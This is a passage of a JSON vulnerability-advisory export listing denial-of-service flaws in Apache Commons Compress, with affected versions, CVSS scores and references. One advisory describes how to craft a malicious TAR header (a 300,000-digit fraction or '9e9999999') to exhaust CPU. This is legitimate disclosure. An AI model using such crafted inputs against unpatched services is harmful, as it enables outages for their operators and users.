"https://lists.apache.org/thread.html/r5caf4fcb69d2749225391e61db7216282955204849ba94f83afe011f@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r590c15cebee9b8e757e2f738127a9a71e48ede647a3044c504e050a4@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5103b1c9242c0f812ac96e524344144402cbff9b6e078d1557bc7b1e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4363c994c8bca033569a98da9218cc0c62bb695c1e47a98e5084e5a0@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r25422df9ad22fec56d9eeca3ab8bd6d66365e9f6bfe311b64730edf5@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r233267e24519bacd0f9fb9f61a1287cb9f4bcb6e75d83f34f405c521@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r21d64797914001119d2fc766b88c6da181dc2308d20f14e7a7f46117@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r05cf37c1e1e662e968cfece1102fcd50fe207181fdbf2c30aadfafd3@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/54cc4e9fa6b24520135f6fa4724dfb3465bc14703c7dc7e52353a0ea@%3Ccommits.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/308cc15f1f1dc53e97046fddbac240e6cd16de89a2746cf257be7f5b@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/jensdietrich/xshady-release/tree/main/CVE-2019-12402" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": 
true, "github_reviewed_at": "2019-09-30T09:39:36Z", "nvd_published_at": "2019-08-30T09:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6fxm-66hq-fc96", "published": "2022-05-13T01:07:05Z", "modified": "2024-11-28T05:48:23.160032Z", "aliases": [ "CVE-2012-2098" ], "summary": "Uncontrolled Resource Consumption in Apache Commons Compress", "details": "Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.4.1" } ] } ], "versions": [ "1.0", "1.1", "1.2", "1.3", "1.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-6fxm-66hq-fc96/GHSA-6fxm-66hq-fc96.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-2098" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/020c03d8ef579e80511023fb46ece30e9c3dd27d" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/0600296ab8f8a0bbdfedd483f51b38005eb8e34e" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/1ce57d976c4f25fe99edcadf079840c278f3cb84" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/2ab2fcb356753927afaa731b9d2dcc47d3083408" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/654222e628097763ee6ca561ae77be5c06666173" }, { "type": "WEB", "url": 
"https://github.com/apache/commons-compress/commit/6ced422bf5eca3aac05396367bafb33ec21bf74e" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/6e95697e783767f3549f00d7d2e1b002eac4a3d4" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/8f702469cbf4c451b6dea349290bc4af0f6f76c7" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/b06f7b41c936ef1a79589d16ea5c1d8b93f71f66" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/cca0e6e5341aacddefd4c4d36cef7cbdbc2a8777" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/ea31005111f0abede7e43e4ba0012e62e0808b22" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/fdd7459bc5470e90024dbe762249166481cce769" }, { "type": "WEB", "url": "https://web.archive.org/web/20140724002926/http://secunia.com/advisories/49286" }, { "type": "WEB", "url": "https://web.archive.org/web/20140724023114/http://secunia.com/advisories/49255" }, { "type": "WEB", "url": "https://web.archive.org/web/20200517014414/http://www.securitytracker.com/id?1027096" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20130525085523/http://www.securityfocus.com/bid/53676" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@\u003csolr-user.lucene.apache.org\u003e" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-compress" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75857" }, { "type": "WEB", "url": "http://ant.apache.org/security.html" }, { "type": "WEB", "url": "http://archives.neohapsis.com/archives/bugtraq/2012-05/0130.html" }, { "type": "WEB", "url": "http://commons.apache.org/compress/security.html" }, { "type": "WEB", "url": 
"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081697.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081746.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2013-May/105049.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2013-May/105060.html" }, { "type": "WEB", "url": "http://packetstormsecurity.org/files/113014/Apache-Commons-Compress-Apache-Ant-Denial-Of-Service.html" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21644047" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/09/13/3" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-07-13T21:10:51Z", "nvd_published_at": "2012-06-29T19:55:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-7hfm-57qf-j43q", "published": "2021-08-02T16:55:07Z", "modified": "2024-03-08T05:18:24.619639Z", "aliases": [ "CVE-2021-35515" ], "summary": "Excessive Iteration in Compress", "details": "When reading a specially crafted 7Z archive, the construction of the list of codecs that decompress an entry can result in an infinite loop. 
This could be used to mount a denial of service attack against services that use Compress' sevenz package.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.21" } ] } ], "versions": [ "1.0", "1.1", "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.16.1", "1.17", "1.18", "1.19", "1.2", "1.20", "1.3", "1.4", "1.4.1", "1.5", "1.6", "1.7", "1.8", "1.8.1", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-7hfm-57qf-j43q/GHSA-7hfm-57qf-j43q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35515" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20211022-0001" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf2f4d7940371a7c7c5b679f50e28fc7fcc82cd00670ced87e013ac88@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbe91c512c5385181149ab087b6c909825d34299f5c491c6482a2ed57@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rbaea15ddc5a7c0c6b66660f1d6403b28595e2561bb283eade7d7cd69@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rab292091eadd1ecc63c516e9541a7f241091cf2e652b8185a6059945@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r19ebfd71770ec0617a9ea180e321ef927b3fefb4c81ec5d1902d20ab%40%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://commons.apache.org/proper/commons-compress/security-reports.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/07/13/1" } ], "database_specific": { "cwe_ids": [ "CWE-834", "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2021-07-14T17:35:41Z", "nvd_published_at": "2021-07-13T08:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", 
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cgwf-w82q-5jrr", "published": "2023-09-14T09:30:28Z", "modified": "2025-02-13T19:34:19.488773Z", "aliases": [ "CVE-2023-42503" ], "related": [ "CGA-6gcx-2g6m-pvm8", "CGA-793c-mm63-qv25" ], "summary": "Apache Commons Compress denial of service vulnerability", "details": "Improper Input Validation, Uncontrolled Resource Consumption vulnerability in Apache Commons Compress in TAR parsing.This issue affects Apache Commons Compress: from 1.22 before 1.24.0.\n\nUsers are recommended to upgrade to version 1.24.0, which fixes the issue.\n\nA third party can create a malformed TAR file by manipulating file modification times headers, which when parsed with Apache Commons Compress, will cause a denial of service issue via CPU consumption.\n\nIn version 1.22 of Apache Commons Compress, support was added for file modification times with higher precision (issue # COMPRESS-612 [1]). The format for the PAX extended headers carrying this data consists of two numbers separated by a period [2], indicating seconds and subsecond precision (for example “1647221103.5998539”). The impacted fields are “atime”, “ctime”, “mtime” and “LIBARCHIVE.creationtime”. No input validation is performed prior to the parsing of header values.\n\nParsing of these numbers uses the BigDecimal [3] class from the JDK which has a publicly known algorithmic complexity issue when doing operations on large numbers, causing denial of service (see issue # JDK-6560193 [4]). A third party can manipulate file time headers in a TAR file by placing a number with a very long fraction (300,000 digits) or a number with exponent notation (such as “9e9999999”) within a file modification time header, and the parsing of files with these headers will take hours instead of seconds, leading to a denial of service via exhaustion of CPU resources. 
This issue is similar to CVE-2012-2098 [5].\n\n[1]: https://issues.apache.org/jira/browse/COMPRESS-612 \n[2]: https://pubs.opengroup.org/onlinepubs/9699919799/utilities/pax.html#tag_20_92_13_05 \n[3]: https://docs.oracle.com/javase/8/docs/api/java/math/BigDecimal.html \n[4]: https://bugs.openjdk.org/browse/JDK-6560193 \n[5]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2098 \n\nOnly applications using CompressorStreamFactory class (with auto-detection of file types), TarArchiveInputStream and TarFile classes to parse TAR files are impacted. Since this code was introduced in v1.22, only that version and later versions are impacted.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.22" }, { "fixed": "1.24.0" } ] } ], "versions": [ "1.22", "1.23.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-cgwf-w82q-5jrr/GHSA-cgwf-w82q-5jrr.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42503" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/aae38bfb820159ae7a0b792e779571f6a46b3889" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-compress" }, { "type": "WEB", "url": "https://lists.apache.org/thread/5xwcyr600mn074vgxq92tjssrchmc93c" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231020-0003" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-09-14T19:35:27Z", "nvd_published_at": "2023-09-14T08:15:08Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-crv7-7245-f45f", "published": "2021-08-02T16:55:15Z", 
"modified": "2024-03-08T05:19:35.252507Z", "aliases": [ "CVE-2021-35516" ], "summary": "Improper Handling of Length Parameter Inconsistency in Compress", "details": "When reading a specially crafted 7Z archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' sevenz package.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.21" } ] } ], "versions": [ "1.0", "1.1", "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.16.1", "1.17", "1.18", "1.19", "1.2", "1.20", "1.3", "1.4", "1.4.1", "1.5", "1.6", "1.7", "1.8", "1.8.1", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-crv7-7245-f45f/GHSA-crv7-7245-f45f.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35516" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20211022-0001" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf68442d67eb166f4b6cf0bbbe6c7f99098c12954f37332073c9822ca%40%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rf5b1016fb15b7118b9a5e16bb0b78cb4f1dfcf7821eb137ab5757c91@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E" }, { "type": "WEB", "url": "https://commons.apache.org/proper/commons-compress/security-reports.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/07/13/2" } ], "database_specific": { "cwe_ids": [ "CWE-130", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2021-07-14T18:11:52Z", "nvd_published_at": "2021-07-13T08:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h436-432x-8fvx", "published": 
"2019-03-14T15:41:12Z", "modified": "2024-02-27T18:34:05.707371Z", "aliases": [ "CVE-2018-1324" ], "summary": "Apache Commons Compress vulnerable to denial of service due to infinite loop", "details": "A specially crafted ZIP archive can be used to cause an infinite loop inside of Apache Commons Compress' extra field parser used by the ZipFile and ZipArchiveInputStream classes in versions 1.11 to 1.15. This can be used to mount a denial of service attack against services that use Compress' zip package.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.11" }, { "fixed": "1.16" } ] } ], "versions": [ "1.11", "1.12", "1.13", "1.14", "1.15" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-h436-432x-8fvx/GHSA-h436-432x-8fvx.json" } }, { "package": { "name": "com.liferay:com.liferay.portal.tools.bundle.support", "ecosystem": "Maven", "purl": "pkg:maven/com.liferay/com.liferay.portal.tools.bundle.support" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.2.7" }, { "fixed": "3.7.4" } ] } ], "versions": [ "3.2.7", "3.3.0", "3.4.0", "3.4.1", "3.4.2", "3.4.3", "3.5.0", "3.5.1", "3.5.2", "3.5.3", "3.5.4", "3.5.5", "3.5.6", "3.6.0", "3.6.1", "3.7.0", "3.7.1", "3.7.2", "3.7.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-h436-432x-8fvx/GHSA-h436-432x-8fvx.json" } }, { "package": { "name": "io.takari:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/io.takari/commons-compress" }, "versions": [ "1.12" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-h436-432x-8fvx/GHSA-h436-432x-8fvx.json" } } ], "references": [ { "type": "ADVISORY", 
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1324" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/2a2f1dc48e22a34ddb72321a4db211da91aa933b" }, { "type": "WEB", "url": "https://arxiv.org/pdf/2306.05534.pdf" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-h436-432x-8fvx" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-compress" }, { "type": "WEB", "url": "https://github.com/jensdietrich/xshady-release/tree/main/CVE-2018-1324" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1c7b6df6d1c5c8583518a0afa017782924918e4d6acfaf23ed5b2089@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b8ef29df0f1d55aa741170748352ae8e425c7b1d286b2f257711a2dd@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5532dc8d5456b5151e8c286801e2e5769f5c04118b29c3b5d13ea387@%3Cissues.beam.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:38:39Z", "nvd_published_at": "2018-03-16T13:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hrmr-f5m6-m9pq", "published": "2018-10-19T16:41:27Z", "modified": "2024-06-05T17:33:15.862538Z", "aliases": [ "CVE-2018-11771" ], "summary": "Moderate severity vulnerability that affects org.apache.commons:commons-compress", "details": "When reading a specially crafted ZIP archive, the read method of Apache Commons Compress 1.7 to 1.17's ZipArchiveInputStream can fail to return the correct EOF indication after the end of the stream has been reached. 
When combined with a java.io.InputStreamReader this can lead to an infinite stream, which can be used to mount a denial of service attack against services that use Compress' zip package.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.7" }, { "fixed": "1.18" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.16.1", "1.17", "1.7", "1.8", "1.8.1", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-hrmr-f5m6-m9pq/GHSA-hrmr-f5m6-m9pq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11771" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9cdd32af7d73e943452167d15801db39e8130409ebb9efb243b3f41@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f28052d04cb8dbaae39bfd3dc8438e58c2a8be306a3f381f4728d7c1@%3Ccommits.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eeecc1669242b28a3777ae13c68b376b0148d589d3d8170340d61120@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e3eae9e6fc021c4c22dda59a335d21c12eecab480b48115a2f098ef6@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c7954dc1e8fafd7ca1449f078953b419ebf8936e087f235f3bd024be@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/b907e70bc422905d7962fd18f863f746bf7b4e7ed9da25c148580c61@%3Cnotifications.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b8ef29df0f1d55aa741170748352ae8e425c7b1d286b2f257711a2dd@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b8da751fc0ca949534cdf2744111da6bb0349d2798fac94b0a50f330@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/714c6ac1b1b50f8557e7342903ef45f1538a7bc60a0b47d6e48c273d@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6c79965066c30d4e330e04d911d3761db41b82c89ae38d9a6b37a6f1@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/35f60d6d0407c13c39411038ba1aca71d92595ed7041beff4d07f2ee@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3565494c263dfeb4dcb2a71cb24d09a1ca285cd6ac74edc025a3af8a@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0adb631517766e793e18a59723e2df08ced41eb9a57478f14781c9f7@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-compress" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/105139" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1041503" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:40:55Z", "nvd_published_at": "2018-08-16T15:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mc84-pj99-q6hh", "published": "2021-08-02T16:55:53Z", "modified": "2024-03-08T05:19:48.954731Z", "aliases": [ "CVE-2021-36090" ], "summary": "Improper Handling of Length Parameter Inconsistency in Compress", "details": "When 
reading a specially crafted ZIP archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' zip package.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.21" } ] } ], "versions": [ "1.0", "1.1", "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.16.1", "1.17", "1.18", "1.19", "1.2", "1.20", "1.3", "1.4", "1.4.1", "1.5", "1.6", "1.7", "1.8", "1.8.1", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-mc84-pj99-q6hh/GHSA-mc84-pj99-q6hh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36090" }, { "type": "WEB", "url": "https://commons.apache.org/proper/commons-compress/security-reports.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbbf42642c3e4167788a7c13763d192ee049604d099681f765385d99d@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbe91c512c5385181149ab087b6c909825d34299f5c491c6482a2ed57@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc4134026d7d7b053d4f9f2205531122732405012c8804fd850a9b26f%40%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc7df4c2f0bbe2028a1498a46d322c91184f7a369e3e4c57d9518cacf@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": 
